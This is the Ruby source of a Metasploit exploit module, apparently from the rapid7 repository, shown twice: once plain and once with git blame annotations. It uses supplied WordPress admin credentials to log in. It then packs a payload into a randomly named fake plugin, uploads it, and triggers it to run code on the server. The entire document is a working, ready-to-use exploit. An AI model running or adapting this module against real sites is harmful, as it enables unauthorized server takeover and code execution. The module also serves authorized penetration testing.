modules/exploits/unix/webapp/wp_admin_shell_upload.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Admin Shell Upload',
      'Description'     => %q{
          This module will generate a plugin, pack the payload into it
          and upload it to a server running WordPress provided valid
          admin credentials are used.
        },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'rastating' # Metasploit module
        ],
      'DisclosureDate'  => '2015-02-21',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['WordPress', {}]],
      'DefaultTarget'   => 0
    ))

    register_options(
      [
        OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
        OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
      ])
  end

  def check
    cookie = wordpress_login(username, password)
    if cookie.nil?
      return CheckCode::Safe
    end

    store_valid_credential(user: username, private: password, proof: cookie)
    CheckCode::Appears
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def generate_plugin(plugin_name, payload_name)
    plugin_script = %Q{<?php
/**
 * Plugin Name: #{plugin_name}
 * Version: #{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}
 * Author: #{Rex::Text.rand_text_alpha(10)}
 * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com
 * License: GPL2
 */
?>}

    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
    zip.add_file("#{plugin_name}/#{payload_name}.php", payload.encoded)
    zip
  end

  def exploit
    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?

    print_status("Authenticating with WordPress using #{username}:#{password}...")
    cookie = wordpress_login(username, password)
    fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
    print_good("Authenticated with WordPress")
    store_valid_credential(user: username, private: password, proof: cookie)

    print_status("Preparing payload...")
    plugin_name = Rex::Text.rand_text_alpha(10)
    payload_name = "#{Rex::Text.rand_text_alpha(10)}"
    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
    zip = generate_plugin(plugin_name, payload_name)

    print_status("Uploading payload...")
    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie)
    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded

    print_status("Executing the payload at #{payload_uri}...")
    register_files_for_cleanup("#{payload_name}.php")
    register_files_for_cleanup("#{plugin_name}.php")
    register_dir_for_cleanup("../#{plugin_name}")
    send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5)
  end
end
Add WordPress admin shell upload module 2015-02-21 01:31:33 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Add WordPress admin shell upload module 2015-02-21 01:31:33 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'rex/zip'`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Add WordPress admin shell upload module 2015-02-21 01:31:33 +00:00			`Rank = ExcellentRanking`

			`include Msf::Exploit::FileDropper`
Update moduels using Msf::HTTP::Wordpress 2015-10-15 11:47:13 -05:00			`include Msf::Exploit::Remote::HTTP::Wordpress`
Add WordPress admin shell upload module 2015-02-21 01:31:33 +00:00
			`def initialize(info = {})`
			`super(update_info(`
			`info,`
			`'Name' => 'WordPress Admin Shell Upload',`
			`'Description' => %q{`
			`This module will generate a plugin, pack the payload into it`
moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00			`and upload it to a server running WordPress provided valid`
Add WordPress admin shell upload module 2015-02-21 01:31:33 +00:00			`admin credentials are used.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
Fix outdated metadata 2018-10-01 18:59:09 +01:00			`'rastating' # Metasploit module`
Add WordPress admin shell upload module 2015-02-21 01:31:33 +00:00			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2015-02-21',`
Add WordPress admin shell upload module 2015-02-21 01:31:33 +00:00			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
			`'Targets' => [['WordPress', {}]],`
			`'DefaultTarget' => 0`
			`))`

			`register_options(`
			`[`
			`OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),`
			`OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Add WordPress admin shell upload module 2015-02-21 01:31:33 +00:00			`end`

Add a check 2017-04-18 16:32:06 -05:00			`def check`
			`cookie = wordpress_login(username, password)`
			`if cookie.nil?`
			`return CheckCode::Safe`
			`end`

Fixes `store_valid_credential` conditional logic for `unix/webapp/wp_admin_shell_upload` module 2024-03-21 12:21:15 +00:00			`store_valid_credential(user: username, private: password, proof: cookie)`
Add a check 2017-04-18 16:32:06 -05:00			`CheckCode::Appears`
			`end`

Add WordPress admin shell upload module 2015-02-21 01:31:33 +00:00			`def username`
			`datastore['USERNAME']`
			`end`

			`def password`
			`datastore['PASSWORD']`
			`end`

			`def generate_plugin(plugin_name, payload_name)`
			`plugin_script = %Q{<?php`
			`/**`
Resolve msftidy issues 2015-02-21 01:41:29 +00:00			`* Plugin Name: #{plugin_name}`
Tidy up various bits of code 2015-02-21 12:53:33 +00:00			`* Version: #{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}`
Add WordPress admin shell upload module 2015-02-21 01:31:33 +00:00			`* Author: #{Rex::Text.rand_text_alpha(10)}`
			`* Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com`
			`* License: GPL2`
			`*/`
			`?>}`

			`zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)`
			`zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)`
Tidy up various bits of code 2015-02-21 12:53:33 +00:00			`zip.add_file("#{plugin_name}/#{payload_name}.php", payload.encoded)`
Add WordPress admin shell upload module 2015-02-21 01:31:33 +00:00			`zip`
			`end`

			`def exploit`
			`fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?`

Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Authenticating with WordPress using #{username}:#{password}...")`
Add WordPress admin shell upload module 2015-02-21 01:31:33 +00:00			`cookie = wordpress_login(username, password)`
			`fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_good("Authenticated with WordPress")`
convert store_valid_credential to named params 2017-05-05 18:23:15 -05:00			`store_valid_credential(user: username, private: password, proof: cookie)`
Add WordPress admin shell upload module 2015-02-21 01:31:33 +00:00
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Preparing payload...")`
Add WordPress admin shell upload module 2015-02-21 01:31:33 +00:00			`plugin_name = Rex::Text.rand_text_alpha(10)`
Tidy up various bits of code 2015-02-21 12:53:33 +00:00			`payload_name = "#{Rex::Text.rand_text_alpha(10)}"`
			`payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")`
Add WordPress admin shell upload module 2015-02-21 01:31:33 +00:00			`zip = generate_plugin(plugin_name, payload_name)`

Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Uploading payload...")`
Add WordPress admin shell upload module 2015-02-21 01:31:33 +00:00			`uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie)`
			`fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded`

Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Executing the payload at #{payload_uri}...")`
Tidy up various bits of code 2015-02-21 12:53:33 +00:00			`register_files_for_cleanup("#{payload_name}.php")`
Add WordPress admin shell upload module 2015-02-21 01:31:33 +00:00			`register_files_for_cleanup("#{plugin_name}.php")`
remove plugin dir 2018-01-15 14:48:59 +01:00			`register_dir_for_cleanup("../#{plugin_name}")`
Add WordPress admin shell upload module 2015-02-21 01:31:33 +00:00			`send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5)`
			`end`
			`end`